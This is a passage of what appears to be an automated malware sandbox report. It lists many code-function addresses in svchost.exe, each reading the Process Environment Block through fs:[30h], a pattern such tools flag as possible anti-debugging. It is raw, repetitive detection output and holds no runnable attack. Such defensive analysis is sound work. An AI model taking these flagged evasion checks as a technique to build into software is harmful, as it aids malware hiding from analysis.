Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]	1_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F61C3 mov eax, dword ptr fs:[00000030h]	1_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]	1_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]	1_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]	1_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B019F mov eax, dword ptr fs:[00000030h]	1_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]	1_2_03804164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804164 mov eax, dword ptr fs:[00000030h]	1_2_03804164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]	1_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]	1_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A197 mov eax, dword ptr fs:[00000030h]	1_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03770185 mov eax, dword ptr fs:[00000030h]	1_2_03770185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]	1_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EC188 mov eax, dword ptr fs:[00000030h]	1_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]	1_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D4180 mov eax, dword ptr fs:[00000030h]	1_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375C073 mov eax, dword ptr fs:[00000030h]	1_2_0375C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03732050 mov eax, dword ptr fs:[00000030h]	1_2_03732050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6050 mov eax, dword ptr fs:[00000030h]	1_2_037B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6030 mov eax, dword ptr fs:[00000030h]	1_2_037C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A020 mov eax, dword ptr fs:[00000030h]	1_2_0372A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C020 mov eax, dword ptr fs:[00000030h]	1_2_0372C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]	1_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]	1_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]	1_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E016 mov eax, dword ptr fs:[00000030h]	1_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B4000 mov ecx, dword ptr fs:[00000030h]	1_2_037B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D2000 mov eax, dword ptr fs:[00000030h]	1_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0372C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037720F0 mov ecx, dword ptr fs:[00000030h]	1_2_037720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0372A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037380E9 mov eax, dword ptr fs:[00000030h]	1_2_037380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B60E0 mov eax, dword ptr fs:[00000030h]	1_2_037B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B20DE mov eax, dword ptr fs:[00000030h]	1_2_037B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F60B8 mov eax, dword ptr fs:[00000030h]	1_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037280A0 mov eax, dword ptr fs:[00000030h]	1_2_037280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C80A8 mov eax, dword ptr fs:[00000030h]	1_2_037C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373208A mov eax, dword ptr fs:[00000030h]	1_2_0373208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738770 mov eax, dword ptr fs:[00000030h]	1_2_03738770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740770 mov eax, dword ptr fs:[00000030h]	1_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730750 mov eax, dword ptr fs:[00000030h]	1_2_03730750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE75D mov eax, dword ptr fs:[00000030h]	1_2_037BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]	1_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772750 mov eax, dword ptr fs:[00000030h]	1_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B4755 mov eax, dword ptr fs:[00000030h]	1_2_037B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376674D mov esi, dword ptr fs:[00000030h]	1_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]	1_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376674D mov eax, dword ptr fs:[00000030h]	1_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]	1_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376273C mov ecx, dword ptr fs:[00000030h]	1_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376273C mov eax, dword ptr fs:[00000030h]	1_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AC730 mov eax, dword ptr fs:[00000030h]	1_2_037AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]	1_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C720 mov eax, dword ptr fs:[00000030h]	1_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03730710 mov eax, dword ptr fs:[00000030h]	1_2_03730710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03760710 mov eax, dword ptr fs:[00000030h]	1_2_03760710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C700 mov eax, dword ptr fs:[00000030h]	1_2_0376C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]	1_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037347FB mov eax, dword ptr fs:[00000030h]	1_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]	1_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]	1_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037527ED mov eax, dword ptr fs:[00000030h]	1_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_037BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B07C3 mov eax, dword ptr fs:[00000030h]	1_2_037B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037307AF mov eax, dword ptr fs:[00000030h]	1_2_037307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E47A0 mov eax, dword ptr fs:[00000030h]	1_2_037E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D678E mov eax, dword ptr fs:[00000030h]	1_2_037D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03762674 mov eax, dword ptr fs:[00000030h]	1_2_03762674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]	1_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F866E mov eax, dword ptr fs:[00000030h]	1_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]	1_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h]	1_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374C640 mov eax, dword ptr fs:[00000030h]	1_2_0374C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374E627 mov eax, dword ptr fs:[00000030h]	1_2_0374E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03766620 mov eax, dword ptr fs:[00000030h]	1_2_03766620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768620 mov eax, dword ptr fs:[00000030h]	1_2_03768620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0373262C mov eax, dword ptr fs:[00000030h]	1_2_0373262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03772619 mov eax, dword ptr fs:[00000030h]	1_2_03772619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE609 mov eax, dword ptr fs:[00000030h]	1_2_037AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]	1_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]	1_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]	1_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037666B0 mov eax, dword ptr fs:[00000030h]	1_2_037666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0376C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]	1_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]	1_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]	1_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]	1_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]	1_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]	1_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]	1_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]	1_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]	1_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6500 mov eax, dword ptr fs:[00000030h]	1_2_037C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]	1_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037325E0 mov eax, dword ptr fs:[00000030h]	1_2_037325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]	1_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]	1_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037365D0 mov eax, dword ptr fs:[00000030h]	1_2_037365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]	1_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]	1_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]	1_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]	1_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]	1_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]	1_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]	1_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E59C mov eax, dword ptr fs:[00000030h]	1_2_0376E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03732582 mov eax, dword ptr fs:[00000030h]	1_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03732582 mov ecx, dword ptr fs:[00000030h]	1_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03764588 mov eax, dword ptr fs:[00000030h]	1_2_03764588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]	1_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]	1_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]	1_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BC460 mov ecx, dword ptr fs:[00000030h]	1_2_037BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EA456 mov eax, dword ptr fs:[00000030h]	1_2_037EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372645D mov eax, dword ptr fs:[00000030h]	1_2_0372645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375245A mov eax, dword ptr fs:[00000030h]	1_2_0375245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]	1_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0376A430 mov eax, dword ptr fs:[00000030h]	1_2_0376A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]	1_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]	1_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]	1_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372C427 mov eax, dword ptr fs:[00000030h]	1_2_0372C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]	1_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]	1_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]	1_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]	1_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037304E5 mov ecx, dword ptr fs:[00000030h]	1_2_037304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037644B0 mov ecx, dword ptr fs:[00000030h]	1_2_037644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_037BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037364AB mov eax, dword ptr fs:[00000030h]	1_2_037364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037EA49A mov eax, dword ptr fs:[00000030h]	1_2_037EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0372CB7E mov eax, dword ptr fs:[00000030h]	1_2_0372CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03728B50 mov eax, dword ptr fs:[00000030h]	1_2_03728B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037DEB50 mov eax, dword ptr fs:[00000030h]	1_2_037DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]	1_2_037E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]	1_2_037E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]	1_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]	1_2_037C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037FAB40 mov eax, dword ptr fs:[00000030h]	1_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037D8B42 mov eax, dword ptr fs:[00000030h]	1_2_037D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]	1_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]	1_2_0375EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]	1_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]	1_2_037F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]	1_2_037AEB1D
